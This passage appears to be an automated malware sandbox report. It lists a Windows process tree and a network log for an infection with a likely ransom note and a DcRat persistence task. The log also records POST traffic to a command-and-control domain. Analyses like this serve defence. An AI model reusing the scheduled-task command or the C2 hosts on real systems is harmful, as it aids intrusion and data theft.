                                                                                                2⤵
                                                                                                  PID:1572
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1032 /prefetch:1
                                                                                                  2⤵
                                                                                                    PID:4404
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2772 /prefetch:1
                                                                                                    2⤵
                                                                                                      PID:1544
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6124 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:1576
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6284 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:2356
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6244 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:3516
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6384 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:1064
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6408 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:2208
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6592 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:720
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6556 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:2892
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:1
                                                                                                                    2⤵
                                                                                                                      PID:1020
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:1
                                                                                                                      2⤵
                                                                                                                        PID:4916
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:1
                                                                                                                        2⤵
                                                                                                                          PID:4868
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:1
                                                                                                                          2⤵
                                                                                                                            PID:4140
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
                                                                                                                            2⤵
                                                                                                                              PID:2684
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6608 /prefetch:1
                                                                                                                              2⤵
                                                                                                                                PID:4212
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5560 /prefetch:8
                                                                                                                                2⤵
                                                                                                                                  PID:1688
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:8
                                                                                                                                  2⤵
                                                                                                                                    PID:2944
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6444 /prefetch:8
                                                                                                                                    2⤵
                                                                                                                                      PID:3200
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6156 /prefetch:8
                                                                                                                                      2⤵
                                                                                                                                        PID:4200
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2212 /prefetch:8
                                                                                                                                        2⤵
                                                                                                                                          PID:4336
                                                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                        1⤵
                                                                                                                                          PID:5092
                                                                                                                                        • C:\Windows\System32\rundll32.exe
                                                                                                                                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                          1⤵
                                                                                                                                            PID:4536
                                                                                                                                          • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                            "C:\Windows\system32\NOTEPAD.EXE" C:\SystemID\PersonalID.txt
                                                                                                                                            1⤵
                                                                                                                                            • Opens file in notepad (likely ransom note)
                                                                                                                                            PID:1988
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\urjgbsd
                                                                                                                                            C:\Users\Admin\AppData\Roaming\urjgbsd
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                            PID:4332
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\ajjgbsd
                                                                                                                                            C:\Users\Admin\AppData\Roaming\ajjgbsd
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:4196
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 320
                                                                                                                                              2⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:3788
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4196 -ip 4196
                                                                                                                                            1⤵
                                                                                                                                              PID:1440
                                                                                                                                            • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                              C:\Windows\SysWOW64\svchost.exe -k LocalService
                                                                                                                                              1⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Checks processor information in registry
                                                                                                                                              PID:4064
                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                "C:\Windows\system32\rundll32.exe" "c:\program files (x86)\windowspowershell\modules\cpdf_rhp..dll",XgZYYzY3NQ==
                                                                                                                                                2⤵
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Checks processor information in registry
                                                                                                                                                PID:2936
                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                "C:\Windows\system32\rundll32.exe" "c:\program files (x86)\windowspowershell\modules\cpdf_rhp..dll",XgZYYzY3NQ==
                                                                                                                                                2⤵
                                                                                                                                                  PID:2280
                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 15570
                                                                                                                                                    3⤵
                                                                                                                                                      PID:1416
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4720
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2916
                                                                                                                                                    • C:\Users\Admin\Desktop\adwcleaner.exe
                                                                                                                                                      "C:\Users\Admin\Desktop\adwcleaner.exe"
                                                                                                                                                      1⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:1664
                                                                                                                                                      • C:\Windows\System32\netsh.exe
                                                                                                                                                        "C:\Windows\System32\netsh.exe" winsock reset
                                                                                                                                                        2⤵
                                                                                                                                                          PID:1768
                                                                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                        1⤵
                                                                                                                                                          PID:4964
                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5020
                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                            1⤵
                                                                                                                                                              PID:4716
                                                                                                                                                            • C:\Windows\system32\taskmgr.exe
                                                                                                                                                              "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                              1⤵
                                                                                                                                                                PID:2132
                                                                                                                                                              • C:\Users\Admin\Desktop\adwcleaner.exe
                                                                                                                                                                "C:\Users\Admin\Desktop\adwcleaner.exe"
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:1932
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:3456
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • DcRat
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:4228
                                                                                                                                                                  • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:4824

                                                                                                                                                                    Network

                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      potunulit.org
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      potunulit.org
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      potunulit.org
                                                                                                                                                                      IN A
                                                                                                                                                                      188.114.96.0
                                                                                                                                                                      potunulit.org
                                                                                                                                                                      IN A
                                                                                                                                                                      188.114.97.0
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://mnxab.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 290
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:17 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PLXubSHRupFxkMN%2BiVxiCZ7ICZt%2Blxn%2B15B180j%2BTIitJsIPucCf3b3%2FC%2B9f%2FT0xz146foZTOVslv%2BNvzdXriTcwIk8jyl3OWpEdF%2F9JBRojWGjwlzdcopwRo2D0FVl%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47d41bb728ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://epqgyk.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 230
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:17 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f2tPMQqbK7TgVl289UOMAVjRasvqBohIXZtsm9YLa5Tj5786hETy6y9Akp%2FdQVNMJuXXPOQRYlhdxrBppkSVB%2BkW%2Fjn%2F8ukrRpIiVA7e1edpy2uSk238kT2YhERXbsqB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47d4fce728ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://uphfk.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 286
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:17 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ink%2BOLf3g%2Bs%2BYZeKTCyVgIAyM4ILTNqkWelZ4q5cgmvxcOtFveoPOvu4WOzZvylMU9KqXgh4ZXJHS%2BfAgaOR6Jp5%2BI5zCabjj0Xi7wMl3O%2B3TvmsA%2FjonIpU3tEB3S%2BI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47d8e99528ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://cetcmi.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 354
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:18 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B82P37QKOQHjX%2BoNv2ujLJmp6ejJKJPr8iJzCMKM85X4UERYk4%2BqTaTtXR1rvEJga%2FXE05fASpoHW%2Ba8cZuTOkEPh22vvMzon%2Fq401H1SUU2loq%2F6KDPGrY%2FgOSJnYFL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47d97a3028ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://acnbwbl.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 302
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:18 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VdjeSZ2jpaPhp6QUcT6X07cbs6r9VP6uVkz0qWP0%2BXHFwxgoSuQXuYvhr50bAuWKR3MEXuud554CndCaPP9btOEWWURrsukpfo9FIa%2FJSAPj6kb9QnoavTuhDXiGysWO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47da3b0428ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://teqsk.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 338
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:18 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dsBJDiZZPIZ1JTcziVheFdXdgdWPNyCmUp1cXKUrVMasK9QO6tP6Hr%2FHpmun57E99ZUHT1BcmSkmwk8CQeGgRKTOvOBBIprxQ2qY7GApcO%2Fn%2BOeg3gzGiNlFZtghMjK5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47dcbe2728ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://lmrfwmb.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 121
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:18 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E1r8M7RvXlmwYeesvepheDNnzVqieEy2fjdt28nwKNVB93NPsGofKPMcoEa928zxGGr4qtmIH9fcu2cCLDhRgW9AsJY311g8K9kgeF%2BmLgpaq4XCqCgH013XQzG39R%2B5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47dddf8728ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://jawjgopu.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 351
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:20 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M%2FDYWq3%2BNxdkpiMDHUVu58u%2Bp08M8L69XVS%2BAECQDghorfPPBPolZSvp7ykx1CAQAxxIoiK5UQg2IOCyswFy7ZRXFF1pWL%2BVeZ7N7U1rhxpzYfTW0I1noJCnlFlAxypJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47e6285128ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://joaqghgni.com/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 141
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
